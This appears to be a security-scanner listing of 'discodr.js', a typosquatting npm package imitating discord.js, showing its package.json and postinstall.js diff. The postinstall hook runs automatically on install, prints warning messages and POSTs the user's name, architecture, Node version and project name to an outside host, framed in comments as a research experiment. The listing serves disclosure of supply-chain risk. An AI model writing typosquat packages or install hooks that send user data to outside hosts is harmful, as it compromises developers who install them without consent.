discodr.js 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of discodr.js might be problematic. Click here for more details.
- package/package.json +12 -0
- package/postinstall.js +33 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "discodr.js",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "This package is intended to catch typos for discord.js safely. Please be careful.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"postinstall": "node postinstall.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|
package/postinstall.js
ADDED
@@ -0,0 +1,33 @@
|
|
1
|
+
// since you're reading this: the point of this package is to actually test how common it is
|
2
|
+
// for people to make this typo.
|
3
|
+
// If I was an attacker, how much damage could I do right here?
|
4
|
+
// Is it even possible to do anything about this? (yeah, but not without unseating 95% of the ecosystem)
|
5
|
+
const http = require("http");
|
6
|
+
const fs = require("fs");
|
7
|
+
|
8
|
+
console.log("!!! YOU HAVE INSTALLED THE WRONG PACKAGE !!!");
|
9
|
+
console.log("!!! You have installed a typo'd package for discord.js !!!");
|
10
|
+
console.log("!!! UPON INSTALLING A PACKAGE THE PACKAGE MAY EXECUTE ANYTHING THEY WANT (I'm writing this to you from your shell!) !!!");
|
11
|
+
console.log("!!! Please, be more careful. And maybe NPM should do something about this. !!!");
|
12
|
+
console.log("!!! If I was an attacker, I could type anything I wanted right now into your shell. !!!");
|
13
|
+
console.log("!!! Please uninstall this package. !!!");
|
14
|
+
|
15
|
+
let pkgname;
|
16
|
+
|
17
|
+
try {
|
18
|
+
pkgname = JSON.parse(fs.readFileSync("./package.json")).name
|
19
|
+
} catch { }
|
20
|
+
|
21
|
+
const thingToLog = /* process.env is a bit too unethical for an experiment. Might actually have secrets. */
|
22
|
+
{ arch: process.arch, version: process.version, user: process.env.USER, pkgname }
|
23
|
+
|
24
|
+
const req = http.request("http://zkldi.xyz:1235/discordjs-test", { method: "POST", headers: { "Content-Type": "application/json" } }, (res) => {
|
25
|
+
process.exit(1);
|
26
|
+
});
|
27
|
+
|
28
|
+
req.write(JSON.stringify(thingToLog));
|
29
|
+
req.end();
|
30
|
+
|
31
|
+
setTimeout(() => {
|
32
|
+
process.exit(2)
|
33
|
+
}, 10_000);
|